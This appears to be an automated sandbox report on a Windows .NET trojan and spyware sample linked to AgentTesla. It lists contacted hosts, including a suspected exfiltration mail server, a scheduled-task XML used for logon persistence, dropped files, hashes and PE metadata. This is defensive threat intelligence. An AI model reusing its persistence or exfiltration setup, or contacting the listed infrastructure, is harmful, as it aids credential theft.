https://account.dyn.com/; sources: jKqPSehspS.exe, 00000000.00000002.1536631690.0000000004259000.00000004.00000800.00020000.00000000.sdmp, jKqPSehspS.exe, 00000009.00000002.3942304427.000000000042E000.00000040.00000400.00020000.00000000.sdmp; malicious: false; reputation: high
https://api.ipify.org/t; sources: jKqPSehspS.exe, 00000009.00000002.3946068127.0000000002ED1000.00000004.00000800.00020000.00000000.sdmp, BLpvFR.exe, 0000000E.00000002.3946194292.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp; malicious: false; reputation: high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name; sources: jKqPSehspS.exe, 00000000.00000002.1534303990.0000000003286000.00000004.00000800.00020000.00000000.sdmp, jKqPSehspS.exe, 00000009.00000002.3946068127.0000000002ED1000.00000004.00000800.00020000.00000000.sdmp, BLpvFR.exe, 0000000A.00000002.1573785874.0000000002756000.00000004.00000800.00020000.00000000.sdmp, BLpvFR.exe, 0000000E.00000002.3946194292.0000000002DB1000.00000004.00000800.00020000.00000000.sdmp; malicious: false; reputation: high
http://mail.iaa-airferight.com; sources: jKqPSehspS.exe, 00000009.00000002.3946068127.0000000002F4C000.00000004.00000800.00020000.00000000.sdmp, BLpvFR.exe, 0000000E.00000002.3946194292.0000000002E2C000.00000004.00000800.00020000.00000000.sdmp; malicious: false; reputation: high
IP / Domain / Country / ASN / ASN Name / Malicious:
104.26.12.205, api.ipify.org, United States, ASN 13335, CLOUDFLARENETUS, malicious: false
46.175.148.58, mail.iaa-airferight.com, Ukraine, ASN 56394, ASLAGIDKOM-NETUA, malicious: false
                                        Joe Sandbox version:42.0.0 Malachite
                                        Analysis ID:1588702
                                        Start date and time:2025-01-11 04:24:19 +01:00
                                        Joe Sandbox product:CloudBasic
                                        Overall analysis duration:0h 9m 27s
                                        Hypervisor based Inspection enabled:false
                                        Report type:full
                                        Cookbook file name:default.jbs
                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                        Number of analysed new started processes analysed:19
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:0
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Sample name:jKqPSehspS.exe
                                        renamed because original name is a hash value
                                        Original Sample Name:23a0eed35d69811a38633d41868a1fd6a20faf3912bde628eb556124fd6e5447.exe
                                        Detection:MAL
                                        Classification:mal100.troj.spyw.evad.winEXE@19/15@3/2
                                        EGA Information:
                                        • Successful, ratio: 100%
                                        HCA Information:
                                        • Successful, ratio: 100%
                                        • Number of executed functions: 159
                                        • Number of non-executed functions: 7
                                        Cookbook Comments:
                                        • Found application associated with file extension: .exe
                                        • Override analysis time to 240000 for current running targets taking high CPU consumption
                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                        • Excluded IPs from analysis (whitelisted): 2.23.242.162, 20.109.210.53, 13.85.23.206, 13.107.246.45
                                        • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                        • Report size getting too big, too many NtCreateKey calls found.
                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                        • Report size getting too big, too many NtQueryValueKey calls found.
                                        • Report size getting too big, too many NtReadVirtualMemory calls found.
Time / Type / Description:
04:25:25, Task Scheduler: Run new task: BLpvFR path: C:\Users\user\AppData\Roaming\BLpvFR.exe
22:25:21, API Interceptor: 8170657x Sleep call for process: jKqPSehspS.exe modified
22:25:23, API Interceptor: 49x Sleep call for process: powershell.exe modified
22:25:28, API Interceptor: 5554198x Sleep call for process: BLpvFR.exe modified
Match / Associated Sample Name or URL / Detection / Threat Name / Context:
104.26.12.205:
  Yoranis Setup.exe: malicious, Unknown; context: api.ipify.org/
  RtU8kXPnKr.exe: malicious, Quasar; context: api.ipify.org/
  jgbC220X2U.exe: malicious, Unknown; context: api.ipify.org/?format=text
  xKvkNk9SXR.exe: malicious, TrojanRansom; context: api.ipify.org/
  GD8c7ARn8q.exe: malicious, TrojanRansom; context: api.ipify.org/
  8AbMCL2dxM.exe: malicious, RCRU64, TrojanRansom; context: api.ipify.org/
  Simple2.exe: malicious, Unknown; context: api.ipify.org/
  Ransomware Mallox.exe: malicious, Targeted Ransomware; context: api.ipify.org/
  Yc9hcFC1ux.exe: malicious, Unknown; context: api.ipify.org/
  6706e721f2c06.exe: malicious, Remcos; context: api.ipify.org/
46.175.148.58:
  A6AHI7Uk18.exe: malicious, AgentTesla
  MyzWeEOlqb.exe: malicious, AgentTesla
  5hD3Yjf7xD.exe: malicious, AgentTesla
  xJZHVgxQul.exe: malicious, AgentTesla
  jG8N6WDJOx.exe: malicious, AgentTesla
  HGhGAjCVw5.exe: malicious, AgentTesla
  0PPJsQE4wD.exe: malicious, AgentTesla
  kzy8qg5lbR.exe: malicious, AgentTesla
  OP53532 Harumi new order.scr.exe: malicious, AgentTesla
  INV01542 , INV01562-7500003124 JTR-0084.exe: malicious, AgentTesla
Match / Associated Sample Name or URL / Detection / Threat Name / Context:
mail.iaa-airferight.com:
  MyzWeEOlqb.exe: malicious, AgentTesla; context: 46.175.148.58
  5hD3Yjf7xD.exe: malicious, AgentTesla; context: 46.175.148.58
  xJZHVgxQul.exe: malicious, AgentTesla; context: 46.175.148.58
  jG8N6WDJOx.exe: malicious, AgentTesla; context: 46.175.148.58
  HGhGAjCVw5.exe: malicious, AgentTesla; context: 46.175.148.58
  0PPJsQE4wD.exe: malicious, AgentTesla; context: 46.175.148.58
  kzy8qg5lbR.exe: malicious, AgentTesla; context: 46.175.148.58
  OP53532 Harumi new order.scr.exe: malicious, AgentTesla; context: 46.175.148.58
  INV01542 , INV01562-7500003124 JTR-0084.exe: malicious, AgentTesla; context: 46.175.148.58
  Shipment Dec Orders valves 2024.scr.exe: malicious, AgentTesla; context: 46.175.148.58
api.ipify.org:
  Wru9ycO2MJ.exe: malicious, AgentTesla; context: 104.26.13.205
  iNFGd6bDZX.exe: malicious, AgentTesla; context: 104.26.12.205
  MyzWeEOlqb.exe: malicious, AgentTesla; context: 104.26.12.205
  5hD3Yjf7xD.exe: malicious, AgentTesla; context: 172.67.74.152
  ukBQ4ch2nE.exe: malicious, AgentTesla; context: 104.26.13.205
  ru52XOQ1p7.exe: malicious, AgentTesla; context: 172.67.74.152
  xJZHVgxQul.exe: malicious, AgentTesla; context: 104.26.12.205
  jG8N6WDJOx.exe: malicious, AgentTesla; context: 104.26.13.205
  HGhGAjCVw5.exe: malicious, AgentTesla; context: 104.26.13.205
  https://glfbanks.com/: malicious, HTMLPhisher; context: 104.26.12.205
Match / Associated Sample Name or URL / Detection / Threat Name / Context:
CLOUDFLARENETUS:
  BalphRTkPS.exe: malicious, FormBook; context: 104.21.32.1
  A6AHI7Uk18.exe: malicious, AgentTesla; context: 172.67.74.152
  Wru9ycO2MJ.exe: malicious, AgentTesla; context: 104.26.13.205
  iNFGd6bDZX.exe: malicious, AgentTesla; context: 104.26.12.205
  n2pGr8w21V.exe: malicious, FormBook; context: 104.18.73.116
  tNXl4XhgmV.exe: malicious, MassLogger RAT; context: 104.21.48.1
  MyzWeEOlqb.exe: malicious, AgentTesla; context: 104.26.12.205
  02Eh1ah35H.exe: malicious, FormBook, GuLoader; context: 172.67.167.146
  5hD3Yjf7xD.exe: malicious, AgentTesla; context: 172.67.74.152
  MBOaS3GRtF.exe: malicious, Snake Keylogger; context: 104.21.64.1
ASLAGIDKOM-NETUA:
  A6AHI7Uk18.exe: malicious, AgentTesla; context: 46.175.148.58
  MyzWeEOlqb.exe: malicious, AgentTesla; context: 46.175.148.58
  5hD3Yjf7xD.exe: malicious, AgentTesla; context: 46.175.148.58
  xJZHVgxQul.exe: malicious, AgentTesla; context: 46.175.148.58
  jG8N6WDJOx.exe: malicious, AgentTesla; context: 46.175.148.58
  HGhGAjCVw5.exe: malicious, AgentTesla; context: 46.175.148.58
  0PPJsQE4wD.exe: malicious, AgentTesla; context: 46.175.148.58
  kzy8qg5lbR.exe: malicious, AgentTesla; context: 46.175.148.58
  OP53532 Harumi new order.scr.exe: malicious, AgentTesla; context: 46.175.148.58
  INV01542 , INV01562-7500003124 JTR-0084.exe: malicious, AgentTesla; context: 46.175.148.58
Match / Associated Sample Name or URL / Detection / Threat Name / Context:
3b5074b1b5d032e5620f69f9f700ff0e:
  A6AHI7Uk18.exe: malicious, AgentTesla; context: 104.26.12.205
  Wru9ycO2MJ.exe: malicious, AgentTesla; context: 104.26.12.205
  iNFGd6bDZX.exe: malicious, AgentTesla; context: 104.26.12.205
  MyzWeEOlqb.exe: malicious, AgentTesla; context: 104.26.12.205
  5hD3Yjf7xD.exe: malicious, AgentTesla; context: 104.26.12.205
  AJ5zYYsisA.exe: malicious, Unknown; context: 104.26.12.205
  AJ5zYYsisA.exe: malicious, Unknown; context: 104.26.12.205
  4NG0guPiKA.exe: malicious, GuLoader, MassLogger RAT; context: 104.26.12.205
  n0nsAzvYNd.exe: malicious, PureLog Stealer, Snake Keylogger, VIP Keylogger; context: 104.26.12.205
  njVvgA8pEB.exe: malicious, MassLogger RAT, PureLog Stealer; context: 104.26.12.205
                                                            No context
                                                            Process:C:\Users\user\AppData\Roaming\BLpvFR.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):1216
                                                            Entropy (8bit):5.34331486778365
                                                            Encrypted:false
                                                            SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                            MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                            SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                            SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                            SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                            Malicious:false
                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                            Process:C:\Users\user\Desktop\jKqPSehspS.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):1216
                                                            Entropy (8bit):5.34331486778365
                                                            Encrypted:false
                                                            SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                            MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                            SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                            SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                            SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                            Malicious:true
                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):2232
                                                            Entropy (8bit):5.380285623575084
                                                            Encrypted:false
                                                            SSDEEP:48:+WSU4xympjgZ9tz4RIoUl8NPZHUl7u1iMugeoM0Uyus:+LHxvCZfIfSKRHmOugU1s
                                                            MD5:D9CF7738F833416DF98067988B7270F6
                                                            SHA1:850DD37FC5CA1D2EDA84ABE415D61F9AF8E7A500
                                                            SHA-256:952C0E59BC9FA7C1BB0515AEC11D3E3A70A6180C8A217A546C15605D9ADED106
                                                            SHA-512:885CFEB3C9146D884229B106B82ED4B85491A9C0289B2C4CF23A051B492F2F75ECA9769078A823B3C7229E45ED0A25693B06E2675FC29BB558BC115201637D14
                                                            Malicious:false
                                                            Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):60
                                                            Entropy (8bit):4.038920595031593
                                                            Encrypted:false
                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                            Malicious:false
                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                            Process:C:\Users\user\AppData\Roaming\BLpvFR.exe
                                                            File Type:XML 1.0 document, ASCII text
                                                            Category:dropped
                                                            Size (bytes):1579
                                                            Entropy (8bit):5.107462687472562
                                                            Encrypted:false
                                                            SSDEEP:24:2di4+S2qhtJ12iy1mcrUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtJxvn:cgeLAYrFdOFzOzN33ODOiDdKrsuT/v
                                                            MD5:4776E633ED1558D935A431CF221DA377
                                                            SHA1:6004B44564871062B18F8A2B171383EF34BDE117
                                                            SHA-256:DBE5EE30D1C9C321E8F9C77DA5BE8A5999E199B3473020364E6DC868F87A1AD2
                                                            SHA-512:BEB87E7BD593B69E700F7DC12275F77A6F39E0ADE442AFB55E73012C7150B1BF46110D20995E18EE2A36020CBFC517A134C50EDCFFAA75766ABCAABD8B1781EF
                                                            Malicious:false
                                                            Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor
                                                            Process:C:\Users\user\Desktop\jKqPSehspS.exe
                                                            File Type:XML 1.0 document, ASCII text
                                                            Category:dropped
                                                            Size (bytes):1579
                                                            Entropy (8bit):5.107462687472562
                                                            Encrypted:false
                                                            SSDEEP:24:2di4+S2qhtJ12iy1mcrUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtJxvn:cgeLAYrFdOFzOzN33ODOiDdKrsuT/v
                                                            MD5:4776E633ED1558D935A431CF221DA377
                                                            SHA1:6004B44564871062B18F8A2B171383EF34BDE117
                                                            SHA-256:DBE5EE30D1C9C321E8F9C77DA5BE8A5999E199B3473020364E6DC868F87A1AD2
                                                            SHA-512:BEB87E7BD593B69E700F7DC12275F77A6F39E0ADE442AFB55E73012C7150B1BF46110D20995E18EE2A36020CBFC517A134C50EDCFFAA75766ABCAABD8B1781EF
                                                            Malicious:true
                                                            Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor
                                                            Process:C:\Users\user\Desktop\jKqPSehspS.exe
                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):927744
                                                            Entropy (8bit):7.32819754870697
                                                            Encrypted:false
                                                            SSDEEP:12288:cIR4R52J+XtwK0LgcOE7V8oL+SuEQD+Dr/POop6hvbJ30zWA0ylgrdm4Vz0Rppp5:cIeetgclptRK+v/tYlb5FA0y
                                                            MD5:3B1B99F3617BBE21D2BD1601E6CE73EE
                                                            SHA1:0BA6E0FE3C8F5A0511694421D841C377C1A4DAE5
                                                            SHA-256:23A0EED35D69811A38633D41868A1FD6A20FAF3912BDE628EB556124FD6E5447
                                                            SHA-512:6EECD51EEA9933FAA504959F456707C0C132DBD2598B64830A94232A3A733550EFADD03FF5F52C89C658BC016AEE3328D429B2382D0B63559E49535CB4FDE14B
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            • Antivirus: ReversingLabs, Detection: 91%
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...piNg..............0.................. ........@.. ....................................@.................................0...O...........................`....................................................... ............... ..H............text........ ...................... ..`.rsrc..............................@..@.reloc.......`.......$..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Users\user\Desktop\jKqPSehspS.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):26
                                                            Entropy (8bit):3.95006375643621
                                                            Encrypted:false
                                                            SSDEEP:3:ggPYV:rPYV
                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                            Malicious:true
                                                            Preview:[ZoneTransfer]....ZoneId=0
                                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Entropy (8bit):7.32819754870697
                                                            TrID:
                                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                            • Win32 Executable (generic) a (10002005/4) 49.78%
                                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                            • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                            File name:jKqPSehspS.exe
                                                            File size:927'744 bytes
                                                            MD5:3b1b99f3617bbe21d2bd1601e6ce73ee
                                                            SHA1:0ba6e0fe3c8f5a0511694421d841c377c1a4dae5
                                                            SHA256:23a0eed35d69811a38633d41868a1fd6a20faf3912bde628eb556124fd6e5447
                                                            SHA512:6eecd51eea9933faa504959f456707c0c132dbd2598b64830a94232a3a733550efadd03ff5f52c89c658bc016aee3328d429b2382d0b63559e49535cb4fde14b
                                                            SSDEEP:12288:cIR4R52J+XtwK0LgcOE7V8oL+SuEQD+Dr/POop6hvbJ30zWA0ylgrdm4Vz0Rppp5:cIeetgclptRK+v/tYlb5FA0y
                                                            TLSH:2115F18AA900E522DE586B342F33D93917356DADBD30D12E6AEC7D9B3FBBDD21414012
                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...piNg..............0.................. ........@.. ....................................@................................
                                                            Icon Hash:c5949296969e8473
                                                            Entrypoint:0x4aba82
                                                            Entrypoint Section:.text
                                                            Digitally signed:false
                                                            Imagebase:0x400000
                                                            Subsystem:windows gui
                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
